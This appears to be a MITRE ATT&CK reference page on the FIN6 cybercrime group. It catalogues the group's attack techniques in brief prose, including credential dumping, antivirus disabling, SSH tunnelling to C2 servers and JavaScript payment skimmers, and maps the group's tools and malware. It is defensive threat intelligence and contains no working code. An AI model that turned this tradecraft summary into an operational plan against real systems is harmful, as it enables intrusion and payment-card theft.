Skip to content

G0037 FIN6

FIN6 is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.23

Item Value
ID G0037
Associated Names Magecart Group 6, ITG08, Skeleton Spider
Version 3.3
Created 31 May 2017
Last Modified 22 March 2023
Navigation Layer View In ATT&CK® Navigator

Associated Group Descriptions

Name Description
Magecart Group 6 4
ITG08 5
Skeleton Spider 1

Techniques Used

Domain ID Name Use
enterprise T1134 Access Token Manipulation FIN6 has used has used Metasploit’s named-pipe impersonation technique to escalate privileges.3
enterprise T1087 Account Discovery -
enterprise T1087.002 Domain Account FIN6 has used Metasploit’s PsExec NTDSGRAB module to obtain a copy of the victim’s Active Directory database.2
enterprise T1560 Archive Collected Data Following data collection, FIN6 has compressed log files into a ZIP archive prior to staging and exfiltration.2
enterprise T1560.003 Archive via Custom Method FIN6 has encoded data gathered from the victim with a simple substitution cipher and single-byte XOR using the 0xAA key, and Base64 with character permutation.27
enterprise T1119 Automated Collection FIN6 has used a script to iterate through a list of compromised PoS systems, copy and remove data to a log file, and to bind to events from the submit payment button.27
enterprise T1547 Boot or Logon Autostart Execution -
enterprise T1547.001 Registry Run Keys / Startup Folder FIN6 has used Registry Run keys to establish persistence for its downloader tools known as HARDTACK and SHIPBREAD.2
enterprise T1110 Brute Force -
enterprise T1110.002 Password Cracking FIN6 has extracted password hashes from ntds.dit to crack offline.2
enterprise T1059 Command and Scripting Interpreter FIN6 has used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.23
enterprise T1059.001 PowerShell FIN6 has used PowerShell to gain access to merchant’s networks, and a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.236
enterprise T1059.003 Windows Command Shell FIN6 has used kill.bat script to disable security tools.3
enterprise T1059.007 JavaScript FIN6 has used malicious JavaScript to steal payment card data from e-commerce sites.7
enterprise T1555 Credentials from Password Stores FIN6 has used the Stealer One credential stealer to target e-mail and file transfer utilities including FTP.6
enterprise T1555.003 Credentials from Web Browsers FIN6 has used the Stealer One credential stealer to target web browsers.6
enterprise T1213 Data from Information Repositories FIN6 has collected schemas and user accounts from systems running SQL Server.6
enterprise T1005 Data from Local System FIN6 has collected and exfiltrated payment card data from compromised systems.789
enterprise T1074 Data Staged -
enterprise T1074.002 Remote Data Staging FIN6 actors have compressed data from remote systems and moved it to another staging system before exfiltration.2
enterprise T1573 Encrypted Channel -
enterprise T1573.002 Asymmetric Cryptography FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.2
enterprise T1048 Exfiltration Over Alternative Protocol -
enterprise T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol FIN6 has sent stolen payment card data to remote servers via HTTP POSTs.7
enterprise T1068 Exploitation for Privilege Escalation FIN6 has used tools to exploit Windows vulnerabilities in order to escalate privileges. The tools targeted CVE-2013-3660, CVE-2011-2005, and CVE-2010-4398, all of which could allow local users to access kernel-level privileges.2
enterprise T1562 Impair Defenses -
enterprise T1562.001 Disable or Modify Tools FIN6 has deployed a utility script named kill.bat to disable anti-virus.3
enterprise T1070 Indicator Removal -
enterprise T1070.004 File Deletion FIN6 has removed files from victim machines.2
enterprise T1036 Masquerading -
enterprise T1036.004 Masquerade Task or Service FIN6 has renamed the “psexec” service name to “mstdc” to masquerade as a legitimate Windows service.3
enterprise T1046 Network Service Discovery FIN6 used publicly available tools (including Microsoft’s built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.2
enterprise T1095 Non-Application Layer Protocol FIN6 has used Metasploit Bind and Reverse TCP stagers.7
enterprise T1027 Obfuscated Files or Information -
enterprise T1027.010 Command Obfuscation FIN6 has used encoded PowerShell commands.6
enterprise T1588 Obtain Capabilities -
enterprise T1588.002 Tool FIN6 has obtained and used tools such as Mimikatz, Cobalt Strike, and AdFind.53
enterprise T1003 OS Credential Dumping -
enterprise T1003.001 LSASS Memory FIN6 has used Windows Credential Editor for credential dumping.23
enterprise T1003.003 NTDS FIN6 has used Metasploit’s PsExec NTDSGRAB module to obtain a copy of the victim’s Active Directory database.23
enterprise T1566 Phishing -
enterprise T1566.001 Spearphishing Attachment FIN6 has targeted victims with e-mails containing malicious attachments.6
enterprise T1566.003 Spearphishing via Service FIN6 has used fake job advertisements sent via LinkedIn to spearphish targets.5
enterprise T1572 Protocol Tunneling FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.2
enterprise T1021 Remote Services -
enterprise T1021.001 Remote Desktop Protocol FIN6 used RDP to move laterally in victim networks.23
enterprise T1018 Remote System Discovery FIN6 used publicly available tools (including Microsoft’s built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.2
enterprise T1053 Scheduled Task/Job -
enterprise T1053.005 Scheduled Task FIN6 has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and FrameworkPOS.2
enterprise T1553 Subvert Trust Controls -
enterprise T1553.002 Code Signing FIN6 has used Comodo code-signing certificates.5
enterprise T1569 System Services -
enterprise T1569.002 Service Execution FIN6 has created Windows services to execute encoded PowerShell commands.3
enterprise T1204 User Execution -
enterprise T1204.002 Malicious File FIN6 has used malicious documents to lure victims into allowing execution of PowerShell scripts.6
enterprise T1078 Valid Accounts To move laterally on a victim network, FIN6 has used credentials stolen from various systems on which it gathered usernames and password hashes.236
enterprise T1102 Web Service FIN6 has used Pastebin and Google Storage to host content for their operations.3
enterprise T1047 Windows Management Instrumentation FIN6 has used WMI to automate the remote execution of PowerShell scripts.5

Software

ID Name References Techniques
S0552 AdFind 3 Domain Account:Account Discovery Domain Trust Discovery Domain Groups:Permission Groups Discovery Remote System Discovery System Network Configuration Discovery
S0154 Cobalt Strike 3 Sudo and Sudo Caching:Abuse Elevation Control Mechanism Bypass User Account Control:Abuse Elevation Control Mechanism Token Impersonation/Theft:Access Token Manipulation Make and Impersonate Token:Access Token Manipulation Parent PID Spoofing:Access Token Manipulation Domain Account:Account Discovery Web Protocols:Application Layer Protocol DNS:Application Layer Protocol Application Layer Protocol BITS Jobs Browser Session Hijacking Visual Basic:Command and Scripting Interpreter Python:Command and Scripting Interpreter JavaScript:Command and Scripting Interpreter PowerShell:Command and Scripting Interpreter Windows Command Shell:Command and Scripting Interpreter Windows Service:Create or Modify System Process Standard Encoding:Data Encoding Data from Local System Protocol Impersonation:Data Obfuscation Data Transfer Size Limits Deobfuscate/Decode Files or Information Asymmetric Cryptography:Encrypted Channel Symmetric Cryptography:Encrypted Channel Exploitation for Client Execution Exploitation for Privilege Escalation File and Directory Discovery Process Argument Spoofing:Hide Artifacts Disable or Modify Tools:Impair Defenses Timestomp:Indicator Removal Ingress Tool Transfer Keylogging:Input Capture Modify Registry Native API Network Service Discovery Network Share Discovery Non-Application Layer Protocol Indicator Removal from Tools:Obfuscated Files or Information Obfuscated Files or Information Office Template Macros:Office Application Startup Security Account Manager:OS Credential Dumping LSASS Memory:OS Credential Dumping Local Groups:Permission Groups Discovery Domain Groups:Permission Groups Discovery Process Discovery Process Hollowing:Process Injection Process Injection Dynamic-link Library Injection:Process Injection Protocol Tunneling Domain Fronting:Proxy Internal Proxy:Proxy Query Registry Reflective Code Loading Windows Remote Management:Remote Services SMB/Windows Admin Shares:Remote Services SSH:Remote Services Remote Desktop Protocol:Remote Services Distributed Component Object Model:Remote Services Remote System Discovery Scheduled Transfer Screen Capture Software Discovery Code Signing:Subvert Trust Controls Rundll32:System Binary Proxy Execution System Network Configuration Discovery System Network Connections Discovery System Service Discovery Service Execution:System Services Pass the Hash:Use Alternate Authentication Material Domain Accounts:Valid Accounts Local Accounts:Valid Accounts Windows Management Instrumentation
S0381 FlawedAmmyy 6 Web Protocols:Application Layer Protocol Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Clipboard Data Windows Command Shell:Command and Scripting Interpreter PowerShell:Command and Scripting Interpreter Data from Local System Data Obfuscation Symmetric Cryptography:Encrypted Channel Exfiltration Over C2 Channel File Deletion:Indicator Removal Ingress Tool Transfer Keylogging:Input Capture Input Capture Peripheral Device Discovery Local Groups:Permission Groups Discovery Screen Capture Security Software Discovery:Software Discovery Rundll32:System Binary Proxy Execution Msiexec:System Binary Proxy Execution System Information Discovery System Owner/User Discovery Windows Management Instrumentation
S0503 FrameworkPOS 1116 Archive via Custom Method:Archive Collected Data Data from Local System Local Data Staging:Data Staged Exfiltration Over Alternative Protocol Process Discovery
S0632 GrimAgent 10 Web Protocols:Application Layer Protocol Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Windows Command Shell:Command and Scripting Interpreter Standard Encoding:Data Encoding Data from Local System Junk Data:Data Obfuscation Deobfuscate/Decode Files or Information Asymmetric Cryptography:Encrypted Channel Symmetric Cryptography:Encrypted Channel Exfiltration Over C2 Channel File and Directory Discovery File Deletion:Indicator Removal Clear Persistence:Indicator Removal Ingress Tool Transfer Native API Obfuscated Files or Information Binary Padding:Obfuscated Files or Information Scheduled Task:Scheduled Task/Job System Information Discovery System Location Discovery System Language Discovery:System Location Discovery System Network Configuration Discovery System Owner/User Discovery Time Based Evasion:Virtualization/Sandbox Evasion
S0372 LockerGoga 3 Account Access Removal Data Encrypted for Impact Disable or Modify Tools:Impair Defenses File Deletion:Indicator Removal Lateral Tool Transfer Loss of Control Loss of Productivity and Revenue Loss of View Code Signing:Subvert Trust Controls System Shutdown/Reboot
S0449 Maze 12 Web Protocols:Application Layer Protocol Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Windows Command Shell:Command and Scripting Interpreter Data Encrypted for Impact Dynamic Resolution Run Virtual Instance:Hide Artifacts Disable or Modify Tools:Impair Defenses Indicator Removal Inhibit System Recovery Masquerade Task or Service:Masquerading Native API Binary Padding:Obfuscated Files or Information Obfuscated Files or Information Process Discovery Dynamic-link Library Injection:Process Injection Scheduled Task:Scheduled Task/Job Service Stop Msiexec:System Binary Proxy Execution System Information Discovery System Language Discovery:System Location Discovery System Network Connections Discovery System Shutdown/Reboot Windows Management Instrumentation
S0002 Mimikatz 5 SID-History Injection:Access Token Manipulation Account Manipulation Security Support Provider:Boot or Logon Autostart Execution Credentials from Password Stores Windows Credential Manager:Credentials from Password Stores Credentials from Web Browsers:Credentials from Password Stores LSASS Memory:OS Credential Dumping DCSync:OS Credential Dumping Security Account Manager:OS Credential Dumping LSA Secrets:OS Credential Dumping Rogue Domain Controller Steal or Forge Authentication Certificates Silver Ticket:Steal or Forge Kerberos Tickets Golden Ticket:Steal or Forge Kerberos Tickets Private Keys:Unsecured Credentials Pass the Ticket:Use Alternate Authentication Material Pass the Hash:Use Alternate Authentication Material
S0284 More_eggs 56 Web Protocols:Application Layer Protocol Windows Command Shell:Command and Scripting Interpreter Standard Encoding:Data Encoding Deobfuscate/Decode Files or Information Symmetric Cryptography:Encrypted Channel File Deletion:Indicator Removal Ingress Tool Transfer Obfuscated Files or Information Security Software Discovery:Software Discovery Code Signing:Subvert Trust Controls Regsvr32:System Binary Proxy Execution System Information Discovery Internet Connection Discovery:System Network Configuration Discovery System Network Configuration Discovery System Owner/User Discovery
S0029 PsExec 23 Domain Account:Create Account Windows Service:Create or Modify System Process Lateral Tool Transfer SMB/Windows Admin Shares:Remote Services Service Execution:System Services
S0446 Ryuk 3 Access Token Manipulation Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Windows Command Shell:Command and Scripting Interpreter Data Encrypted for Impact File and Directory Discovery Windows File and Directory Permissions Modification:File and Directory Permissions Modification Disable or Modify Tools:Impair Defenses Inhibit System Recovery Loss of Productivity and Revenue Match Legitimate Name or Location:Masquerading Masquerading Native API Obfuscated Files or Information Process Discovery Process Injection SMB/Windows Admin Shares:Remote Services Scheduled Task:Scheduled Task/Job Service Stop System Information Discovery System Language Discovery:System Location Discovery System Network Configuration Discovery Traffic Signaling Domain Accounts:Valid Accounts
S0005 Windows Credential Editor 2 LSASS Memory:OS Credential Dumping

References

  1. CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018. 

  2. FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016. 

  3. McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019. 

  4. Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020. 

  5. Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019. 

  6. Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019. 

  7. Chen, J. (2019, October 10). Magecart Card Skimmers Injected Into Online Shops. Retrieved September 9, 2020. 

  8. Klijnsma, Y. (2018, September 11). Inside the Magecart Breach of British Airways: How 22 Lines of Code Claimed 380,000 Victims. Retrieved September 9, 2020. 

  9. Klijnsma, Y. (2018, September 19). Another Victim of the Magecart Assault Emerges: Newegg. Retrieved September 9, 2020. 

  10. Priego, A. (2021, July). THE BROTHERS GRIM: THE REVERSING TALE OF GRIMAGENT MALWARE USED BY RYUK. Retrieved July 16, 2021. 

  11. Kremez, V. (2019, September 19). FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis & Internals. Retrieved September 8, 2020. 

  12. Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020.